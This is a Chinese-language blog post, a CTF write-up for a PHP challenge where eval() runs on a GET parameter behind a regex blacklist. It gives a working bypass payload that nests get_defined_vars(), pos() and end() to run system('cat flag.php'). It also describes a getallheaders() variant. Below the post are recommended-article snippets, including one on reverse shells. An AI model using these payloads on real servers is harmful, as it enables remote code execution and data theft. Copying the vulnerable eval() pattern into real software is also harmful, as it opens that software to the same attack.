catflag web wp

最新推荐文章于 2023-09-06 23:34:56 发布
最新推荐文章于 2023-09-06 23:34:56 发布
阅读量542 收藏 1
点赞数
文章标签: 编辑器 vscode macos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62761134/article/details/122806350
版权

命令执行之我在哪


<?php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){
    if(!preg_match('/php:\/\/|data:\/\/|phar:\/\/|phpinfo()|info|rm|find|flag|rm|\/|echo|\.|\\\|\*|\?/i',$_GET['cmd'])){
        @eval($_GET['cmd']);
    }else{
        echo "danger_string";
    }
}else{
    echo "你啥也不输入,给你个假的flag:flag{error_flag}";
}
# mumuzi到此一游
?>

很明显是一个命令执行的题目
正则过滤的东西还是蛮多的
直接上方法吧

法一

paylaod
eval(end(pos(get_defined_vars())));&a=system("cat flag.php");
解释一下
这里我们先使用get_defined_vars(),首先看一下它的回显 返回由所有已定义变量所组成的数组

$_GET
$_POST
$_FILES
$_COOKIE

我们这里的选择也就具有多样性,可以利用$_GET进行RCE,例如 给变量后面添加一个a 就成这样
?cmd=var_dump(get_defined_vars());&a=1; 得到的结果如下
在这里插入图片描述那么我们就可以构造而已参数 比如 system('ls'); 然后想办法让他执行 我们就可以所以 先使用 pos 输出数组中的当前元素的值:
然后在使用 end 提取出来 使用eval执行 就ok了

第二个方法

在这里插入图片描述

第二个的payload是这样的
之前我们获取的是所有环境变量的列表,但其实我们并不需要这么多信息。仅仅http header即可
在apache2环境下,我们有函数getallheaders()可返回 剩下的还上面法一的操作一样

syst3m
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 485
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP
代码审计-php命令执行
小刚的博客
07-27 624
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 php命令执行前言返回执行结果无返回执行结果命令执行小技巧1.在命令执行过程中,我们会遇到空格被删除或者替换的情况2.在命令执行过程中,我们会进行多条命令执行防范措施 前言 近期在学习php的代码审计,推一下这本书啊代码审计 企业级Web代码安全架构_尹毅著。 前篇文章介绍过代码执行了,现在写写命令执行。 命令执行就是执行命令,执行win和Linux的系统命令 php中有好几个可以执行系统命令的.
php代码审计【5】代码执行漏洞
司徒荆的博客
06-16 791
代码执行漏洞
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3459
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
CTFSHOW PHP
qq_63676207的博客
11-13 631
v2$v3此题先看其在GET传三个参数v0那个有与运算符的先后性所以v1只能数字,即v2是指令v3必须有;字符构造playload方法一:?v1=1&v2=?>进行对前面的闭合内敛执行/* */ 对(‘ctfshow’)内容进行注释;进行代码闭合方法二:?对内容进行注释通过var_dump()将ctfshow荡出来利用注释这种的姿势很多下面讲另一种方法方法三:?
CtfHub-wpweb
最新发布
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
wpWeb服务编程案例
04-03
在Windows Phone(简称WP)平台上,开发者可以利用Web服务编程技术来创建强大的应用程序,与远程服务器进行数据交换,实现丰富的功能。本案例旨在探讨如何在Windows Phone设备上开发Web服务应用,通过集成Web服务,...
web-wp-API
02-21
Adonis API应用程序 这是在AdonisJs中创建API服务器的样板,它已预先配置。 人体分析仪 验证 CORS 清醒的ORM 迁移与种子 设置 使用adonis命令安装蓝图 adonis new yardstick --api-only 或手动克隆存储库,然后...
web-product-dark_WordPress_wp_
10-03
【标题】"web-product-dark_WordPress_wp_" 指的是一款专门为RevoSlider设计的WordPress主题,名为"web-product-dark"。RevoSlider是一个流行的WordPress滑块插件,用于创建吸引人的动态内容展示,如产品滑块、图像...
CTFSHOW-文件包含
Monica的博客
09-12 5641
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
bugku web题解
为之的博客
10-19 534
19.10.19 1.变量1 http://123.206.87.240:8004/index1.php flag In the variable !<?php error_reporting(0); include"flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args=$_G...
命令执行小记2
weixin_52387684的博客
11-28 4713
命令执行分类 根据是否结果输出,分为回显和无回显命令执行两种类型 漏洞挖掘第一步:判断是否存在命令执行 方法: 1.根据页面响应延时 2.发送HTTP请求,HTTP服务端显示请求 3.发送DNS,DNS请求服务端显示请求 延时执行 在shell命令中,具有sleep命令可以完成延时执行。 ls -alh | sleep 3 PHP无回显代码漏洞 <?php highlight_file(__FILE__); $cmd = $_GET['cmd']; shell_exec
25分钟了解命令执行漏洞【例题+详细讲解】(一)
贤鱼的博客
09-11 2688
一文初入命令执行漏洞
ctf.show web 刷题记录
rev1ve的博客
08-21 291
默认为 php+4或者6位随机数字和大小写字母,在windows下有tmp后缀,linux没有。source /home/user/bash 等同于 . /home/user/bash。临时文件夹可通过php.ini的upload_tmp_dir 指定,默认是/tmp目录。我们要利用eval()函数命令执行,但是我们看一下if语句,发现是无字母数字RCE,并且不能用取反,异或,自增去绕过。php上传文件后会将文件存储在临时文件夹,然后用move_uploaded_file()
cat-flag解析
weixin_43404314的博客
04-19 3114
点开图片,发现是由两种不同的猫咪组成的,尝试用WinHex解析,发现没有用,看了其他正确解析,才知道其实是二进制转字符,将其转化成二进制SACII码进行解码即可得flag 二进制转字符可参考https://baike.sogou.com/v57727847.htm?fromTitle=%E4%BA%8C%E8%BF%9B%E5%88%B6ASCII%E7%A0%81 ...
cat flag
lastwinn的博客
08-01 939
cat flag <?php ​ if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); } } else { highlight_file(__FILE__); } ?> 题目给了一点点代码,对cmd参...
xctf攻防世界 MISC之CatFlag
l8947943的博客
09-06 7328
拿到的是一个无后缀的flag文件,用winhex打开后发现是奇奇怪怪的乱码,用kali的strings搜索也没找到flag情况。
UNCTF2021 部分wp.pdf
12-10
"UNCTF2021 部分wp.pdf" 本文档是关于UNCTF2021网络安全竞赛的一些解题心得与解决方案,主要涵盖了WEB、Reserve和Crypto三个领域的挑战。 1. WEB挑战 (1) fuzz_md5 这个挑战涉及到MD5碰撞和preg_replace漏洞的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值